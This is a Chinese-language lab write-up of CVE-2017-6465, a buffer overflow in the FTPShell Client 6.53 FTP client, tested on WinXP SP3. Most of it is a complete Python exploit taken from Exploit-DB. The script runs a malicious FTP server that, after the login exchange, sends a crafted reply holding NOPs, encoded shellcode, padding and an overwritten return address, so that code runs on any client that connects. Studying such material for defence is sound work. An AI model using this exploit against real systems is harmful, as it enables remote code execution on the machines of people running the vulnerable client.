0x00.前言
FTPShell是一款国外Windows平台下比较流行的FTP服务工具,截至本文客户端最新版6.53下载地址:http://www.ftpshell.com/downloadclient.htm#
实验环境:VMWare + WinXP SP3 EN
Vulnerable App 获取地址:http://www.ftpshell.com/downloadclient.htm#
0x01.利用
该缓冲区溢出漏洞发生在客户端与FTP服务端初始化认证连接阶段,首先实验环境下安装好 FTPShell Client 6.53
这里我们直接使用Explit-DB提供的python代码搭建一台恶意FTP服务器
1 # Exploit Title: FTPShell Client 6.53 buffer overflow on making initial connection 2 # Date: 2017-03-04 3 # Exploit Author: Peter Baris 4 # Vendor Homepage: http://www.saptech-erp.com.au 5 # Software Link: http://www.ftpshell.com/downloadclient.htm 6 # Version: Windows Server 2008 R2 x64 7 # Tested on: Windows Server 2008 R2 Standard x64 8 # CVE: CVE-2017-6465 9 # 2017-03-04: Software vendor notified 10 # 2017-03-06: No reply 11 # 2017-03-06: Publishing 12 13 import socket 14 import sys 15 16 shell=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" 17 "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" 18 "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" 19 "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" 20 "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" 21 "\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37" 22 "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48" 23 "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48" 24 "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c" 25 "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" 26 "\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48" 27 "\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" 28 "\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48" 29 "\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43" 30 "\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57" 31 "\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a" 32 "\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b" 33 "\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53" 34 "\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37" 35 "\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49" 36 "\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46" 37 "\x4e\x36\x43\x46\x42\x50\x5a") #这里替换成弹出calc.exe的shellcode 38 39 port = 21 40 41 try: 42 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 43 s.bind(("0.0.0.0", port)) #绑定本地21端口 44 s.listen(5) #开启FTP服务监听 45 print("[i] FTP server started on port: "+str(port)+"\r\n") 46 except: 47 print("[!] Failed to bind the server to port: "+str(port)+"\r\n") 48 49 50 # 004b95dc in ftpshell.exe PUSH ESI ; RETN 51 eip = "\xdc\x95\x4b" #该地址在WinXP SP3 EN中仍可使用 52 nops = "\x90"*8 53 junk = "A"*(400-len(nops)-len(shell)) 54 buffer = nops + shell + junk + eip #构造出恶意Buffer结构 55 56 while True: 57 conn, addr = s.accept() 58 conn.send(‘220 Welcome to your unfriendly FTP server\r\n‘) 59 print(conn.recv(1024)) 60 conn.send("331 OK\r\n") 61 print(conn.recv(1024)) 62 conn.send(‘230 OK\r\n‘) 63 print(conn.recv(1024)) 64 conn.send(‘220 "‘+buffer+‘" is current directory\r\n‘) #发送恶意Buffer结构
执行脚本,启动服务
受害机中FTPShell客户端连接恶意FTP服务器,可以发现客户端立即报错,Shellcode被执行
注:本人并未在Win2008 SP2中实验过
0x02.参考链接
Exploit-db:https://www.exploit-db.com/exploits/41511/
时间: 2024-12-19 06:08:32